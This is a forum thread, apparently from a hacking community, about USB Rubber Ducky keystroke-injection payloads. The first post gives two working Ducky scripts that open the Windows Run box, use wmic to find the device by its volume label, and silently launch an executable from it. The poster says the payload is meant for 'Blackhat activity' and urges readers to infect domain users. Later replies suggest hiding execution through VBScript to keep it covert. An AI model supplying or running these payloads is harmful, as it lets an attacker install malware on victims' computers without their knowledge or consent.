[PayLoad] The Ultimate Payload - Execute Files in seconds

[AgentGod]

For long I have been searching around for a payload as such, but the only thing I found was the following;

https://github.com/hak5darren/USB-Rubber-Ducky/wiki/Payload---runexe-from-sd

Which essentially is not even 10% efficient. You need Administrative rights to use the Payload above (Diskpart) and what's with the Vbs. If you really do want to execute and run, you do not need to put the file in temp. You can put your file in a Winrar SFX which will put your malware into which folder you wish and run it there. Tutorial on that will come later, as I have too much to do.

The below payload takes 3-4 seconds before executing. You have to remount (Plug in the Rubber ducky, let it install drivers, then replug it and have your file be executed).

DELAY 3000
GUI r
DELAY 100
STRING cmd /c for /f %a in ('wmic logicaldisk get volumename^, name ^| find "DUCKY"') do start "" /D %a\ %a\DUCKY.exe
DELAY 10
ENTER

That one is one of the codes, simple AF. It goes into Run line, uses the wmic logicaldisk command to search for the drive name of anything you want (Ducky) and executes it in matter of seconds. I believe the Terminal is up for a matter of seconds not even that.

You can use the Twin Ducky to have your file stored on your ducky. I believe you can loop the command above so you do not need to replug, but it will just take long and is not worth it.

This is another code, does the same, but is shorter:


DELAY 3000
GUI r
DELAY 100

cmd /c for /f %a in ('wmic volume get DriveLetter^, Label ^| find "DY"') do start %a\t.exe

DELAY 10
ENTER


The code above is almost instant (Depends on your malware size)

And yes, this payload is meant for Blackhat activity. If you do edit it, do give proper credits.

New scripts will come, making it easier for all of us to execute our files, going back to normal fast Autorun, not a 3 page long script that takes 15 minutes to execute.

I forgot to mention, this does not require administrative rights, so no need to bypass the freaking UAC problems. And go on infect domain users.

Winrar SFX:

Edited January 25, 2014 by AgentGod

[overwraith]

I am relatively new to the whole hacking scene, and I did not know until recently that diskpart was an admin tool. The whole idea behind runexe from SD was to make a batch file that waited for the ducky SD card to be mounted. The ducky SD card mounting did not used to be as efficient as it is today. Yes, there is room for improvement, or even replacement of my code. I am really only into this hacking thing on free time, and I do not have the pen testing knowledge that somebody trained in the field would have. The VBS thing is actually a technique for running a batch file on windows silently. Recent windows versions took that ability away, so a workaround was required, hence the VBS. As I was saying before there used to be a substantial delay between when the keyboard would run, and when the SD was mounted. You could use the button, but I wanted something that would automatically run, so a batch file was needed.

[MB60893]

You could always use a VBScript to detect when the drive is there, then write the ducky drive letter to a .bat file. Then execute that Best thing is the VBScript won't be shown in any kind of console/terminal, so you are really going to make the script covert!

EDIT: I see that a newer vbscript has been added with the same properties. Just use that and modify if you have any further troubles.

Edited January 25, 2014 by MB60893